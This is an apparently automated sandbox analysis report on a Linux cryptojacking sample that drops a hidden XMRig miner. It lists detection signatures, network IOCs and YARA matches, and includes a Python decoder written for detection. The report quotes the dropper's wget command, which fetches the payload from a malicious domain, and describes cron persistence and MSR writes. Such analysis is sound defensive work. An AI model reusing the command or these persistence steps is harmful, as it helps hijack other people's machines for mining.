Linux Analysis Report
.main.elf

Overview

General Information

Sample name: .main.elf
Analysis ID: 1545520
MD5: 1b1445cab8443509f13769a3c479404f
SHA1: 9b1fcc3637f92d8fa281f7ab2243cb382f4be285
SHA256: 864a395c401c668ac8e23aa27eb4bc281e3734d4eafc29178174d79bae48a173
Tags: elf, user-abuse_ch

Detection

Xmrig
Score: 92
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Xmrig cryptocurrency miner
Detected Stratum mining protocol
Drops invisible ELF files
Executes the "crontab" command typically for achieving persistence
Found strings related to Crypto-Mining
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using cron
Tries to load the MSR kernel module used for reading/writing to CPUs model specific register
Writes ELF files to hidden directories
Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)
Creates hidden files and/or directories
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "grep" command used to find patterns in files or piped streams
Executes the "mkdir" command used to create folders
Executes the "modprobe" command used for loading kernel modules
Executes the "pgrep" command used to search for processes by name or attribute
Executes the "rm" command used to delete files or directories
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "wget" command typically used for HTTP/S downloading
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

Bitcoin Miner (engine category label; the sample itself is XMRig, a Monero/RandomX CPU miner, as the stratum login payload and its "rx/0" algorithm list below show)

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: diicot PID: 6257, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: .report_system PID: 6257, type: MEMORYSTR
Source: Yara match File source: /var/tmp/.rcu_gp/.report_system, type: DROPPED
Source: global traffic TCP traffic: 192.168.2.23:48596 -> 91.184.240.129:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 62 75 6e 72 61 75 22 2c 22 70 61 73 73 22 3a 22 62 75 6e 72 61 75 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 32 31 2e 30 20 28 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 6c 69 62 75 76 2f 31 2e 34 34 2e 32 20 67 63 63 2f 37 2e 33 2e 31 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"bunrau","pass":"bunrau","agent":"xmrig/6.21.0 (linux x86_64) libuv/1.44.2 gcc/7.3.1","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp String found in binary or memory: CryptonightR_instruction_mov105
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp String found in binary or memory: stratum+tcp://
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp String found in binary or memory: XMRig 6.21.0
Source: /bin/sh (PID: 6270) Modprobe: /sbin/modprobe -> /sbin/modprobe msr allow_writes=on
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6263) MSR open for writing: /dev/cpu/0/msr
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6263) MSR open for writing: /dev/cpu/1/msr
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from proc file: /proc/cpuinfo
Source: /usr/bin/pgrep (PID: 6256) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/die_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/package_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/die_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/package_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/physical_package_id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/possible
Source: /usr/bin/pgrep (PID: 6285) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6300) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6311) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6319) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6329) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6335) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6344) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/bash (PID: 6233) Wget executable: /usr/bin/wget -> wget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system
Source: /usr/bin/wget (PID: 6233) Reads hosts file: /etc/hosts
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6263) Reads hosts file: /etc/hosts
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected:
GET /.puscarie/.report_system HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: xkobeimparatu.net
Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: xkobeimparatu.net
Source: global traffic DNS traffic detected: DNS query: xkobeproxy.xkobeimparatu.net
Source: .main.elf String found in binary or memory: https://bugs.launchpad.net/ubuntu/
Source: .report_system, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp String found in binary or memory: https://gcc.gnu.org/bugsterminate
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, .report_system, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, .report_system, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, .report_system, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: diicot, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, .report_system, 6257.1.0000000000400000.0000000000c29000.r-x.sdmp String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
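The login message captured on 192.168.2.23:48596 -> 91.184.240.129:80 above is the Stratum handshake in the clear: one JSON-RPC 2.0 object per line, with the miner identifying itself in the "agent" field and listing every algorithm it can hash. The decoder below is an added example (not code from the report, the sandbox or XMRig). It accepts the payload in either form the report prints, the hex column or the ASCII column, parses the login and turns it into detection findings. Two details worth knowing: the hex column shows the agent as "XMRig/6.21.0 (Linux x86_64) libuv/1.44.2 gcc/7.3.1" (the report's ASCII rendering lowercases it), and "bunrau" is not a Monero wallet address, so the pool at 91.184.240.129 is keyed by some other credential. The wallet-address heuristic and the web-port check are this example's own assumptions.

```python
"""Decode a Stratum (newline-delimited JSON-RPC) mining login and classify it.
Added example; CAPTURED_LOGIN is the message from the report, taken from the
hex column so the user agent keeps its original case."""
import json
import re
from dataclasses import dataclass
from typing import List, Optional, Union

CAPTURED_LOGIN = (
    '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"bunrau",'
    '"pass":"bunrau","agent":"XMRig/6.21.0 (Linux x86_64) libuv/1.44.2 gcc/7.3.1",'
    '"algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz",'
    '"cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube",'
    '"cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq",'
    '"rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2",'
    '"argon2/ninja","ghostrider"]}}\n'
)
CAPTURED_DST = "91.184.240.129:80"  # destination from the report's traffic line

HEX_DUMP_RE = re.compile(r"^(?:[0-9a-fA-F]{2}\s*)+$")       # "7b 22 69 ..." form
AGENT_RE = re.compile(r"^(?P<name>xmrig(?:-proxy)?)/(?P<version>[\d.]+)", re.I)
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


@dataclass
class StratumLogin:
    login: str
    password: str
    agent: str
    algos: List[str]
    miner: Optional[str]      # normalised product name parsed from the agent
    version: Optional[str]
    dst: str


def decode_payload(raw: Union[bytes, str]) -> str:
    """Accept raw bytes, decoded text, or a space-separated hex dump."""
    if isinstance(raw, bytes):
        return raw.decode("utf-8", errors="replace")
    if HEX_DUMP_RE.match(raw):
        return bytes.fromhex("".join(raw.split())).decode("utf-8", errors="replace")
    return raw


def looks_like_monero_address(s: str) -> bool:
    """Heuristic (assumption of this example): standard/subaddress are 95
    base58 chars starting with 4 or 8, integrated addresses are 106 chars."""
    return len(s) in (95, 106) and s[0] in "48" and set(s) <= BASE58


def parse_stratum_logins(raw: Union[bytes, str], dst: str = "") -> List[StratumLogin]:
    """Return every 'login' request in the payload; skip submits, keepalives
    and non-JSON lines (Stratum carries one JSON object per line)."""
    logins = []
    for line in decode_payload(raw).splitlines():
        line = line.strip()
        if not line.startswith("{"):
            continue
        try:
            msg = json.loads(line)
        except json.JSONDecodeError:
            continue
        if msg.get("jsonrpc") != "2.0" or msg.get("method") != "login":
            continue
        p = msg.get("params") or {}
        agent = str(p.get("agent", ""))
        m = AGENT_RE.match(agent)
        logins.append(StratumLogin(
            login=str(p.get("login", "")), password=str(p.get("pass", "")),
            agent=agent, algos=[str(a) for a in p.get("algo", [])],
            miner=m.group("name").lower() if m else None,
            version=m.group("version") if m else None, dst=dst))
    return logins


def assess(login: StratumLogin) -> List[str]:
    """Findings a detection engineer would raise on one login message."""
    found = []
    if login.miner:
        found.append(f"{login.miner} {login.version} stratum login to {login.dst or '?'}")
    if any(a.startswith("rx/") for a in login.algos):
        found.append("RandomX advertised: Monero-class CPU mining")
    if login.dst.rsplit(":", 1)[-1] in ("80", "443"):
        found.append("stratum carried on an HTTP/HTTPS port (pool hidden behind web ports)")
    if login.login and not looks_like_monero_address(login.login):
        found.append(f"login {login.login!r} is not a wallet address: proxy or worker credential")
    return found


if __name__ == "__main__":
    for lg in parse_stratum_logins(CAPTURED_LOGIN, CAPTURED_DST):
        print("\n".join(assess(lg)))
```

Feed it the TCP payloads of any connection that is not recognised as HTTP; a "login" object with an "agent" and "algo" list is the miner announcing itself regardless of the port, and the same parser works on the stratum+tcp:// and stratum+ssl://randomx.xmrig.com:443 endpoints embedded in the binary once the TLS leg is terminated.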

System Summary

Source: dump.pcap, type: PCAP Matched rule: Linux_Cryptominer_Camelot_cdd631c1 Author: unknown
Source: dump.pcap, type: PCAP Matched rule: Linux_Cryptominer_Malxmr_979160f6 Author: unknown
Source: dump.pcap, type: PCAP Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: dump.pcap, type: PCAP Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY Matched rule: Linux_Cryptominer_Camelot_cdd631c1 Author: unknown
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY Matched rule: Linux_Cryptominer_Malxmr_979160f6 Author: unknown
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: diicot PID: 6257, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: .report_system PID: 6257, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: /var/tmp/.rcu_gp/.report_system, type: DROPPED Matched rule: Linux_Cryptominer_Camelot_cdd631c1 Author: unknown
Source: ELF static info symbol of initial sample .symtab present: no
Source: dump.pcap, type: PCAP Matched rule: Linux_Cryptominer_Camelot_cdd631c1 reference_sample = 91549c171ae7f43c1a85a303be30169932a071b5c2b6cf3f4913f20073c97897, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Camelot, fingerprint = fa174ac25467ab6e0f11cf1f0a5c6bf653737e9bbdc9411aabeae460a33faa5e, id = cdd631c1-2c03-47dd-b50a-e8c0b9f67271, last_modified = 2021-09-16
Source: dump.pcap, type: PCAP Matched rule: Linux_Cryptominer_Malxmr_979160f6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Malxmr, fingerprint = fb933702578e2cf7e8ad74554ef93c07b610d6da8bc5743cbf86c363c1615f40, id = 979160f6-402a-4e4b-858a-374c9415493b, last_modified = 2021-09-16
Source: dump.pcap, type: PCAP Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: dump.pcap, type: PCAP Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY Matched rule: Linux_Cryptominer_Camelot_cdd631c1 reference_sample = 91549c171ae7f43c1a85a303be30169932a071b5c2b6cf3f4913f20073c97897, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Camelot, fingerprint = fa174ac25467ab6e0f11cf1f0a5c6bf653737e9bbdc9411aabeae460a33faa5e, id = cdd631c1-2c03-47dd-b50a-e8c0b9f67271, last_modified = 2021-09-16
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY Matched rule: Linux_Cryptominer_Malxmr_979160f6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Malxmr, fingerprint = fb933702578e2cf7e8ad74554ef93c07b610d6da8bc5743cbf86c363c1615f40, id = 979160f6-402a-4e4b-858a-374c9415493b, last_modified = 2021-09-16
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 6257.1.0000000000400000.0000000000c29000.r-x.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: diicot PID: 6257, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: .report_system PID: 6257, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
